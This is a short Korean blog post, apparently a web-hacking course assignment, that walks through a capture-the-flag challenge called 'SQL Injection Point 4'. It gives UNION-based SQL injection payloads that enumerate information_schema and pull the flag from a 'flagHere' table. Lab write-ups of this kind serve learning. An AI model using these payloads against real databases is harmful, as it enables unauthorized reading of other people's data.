SQL Injection Point 4

50

flag를 찾으세요!


 

reqeust body 

option_val=username union select table_name,table_schema,3,4,5,6,7,8,9,10 from information_schema.tables order by 1 #&board_result=aksrl25&board_search=%F0%9F%94%8D&date_from=&date_to=

 

injection

option_val=username union select table_name,table_schema,3,4,5,6,7,8,9,10 from information_schema.tables order by 1

 

flagHere 테이블 확

 

테이블 스키마를 역정

option_val=username union select table_name,table_schema,column_name,4,5,6,7,8,9,10 from information_schema.columns order by 2 desc

 

option_val=username union select idx,flag,3,4,5,6,7,8,9,10 from flagHere #

'웹 해킹 코스 > 과제' 카테고리의 다른 글

11차 문제 풀이 Steal Info  (0) 2024.01.20
XSS 문제풀이 및 보고서 작성하기  (0) 2024.01.01
SQL Injection Point 3  (0) 2023.12.20
SQL Injection Point 2  (0) 2023.12.20
SQL Injection Point 1  (1) 2023.12.18

+ Recent posts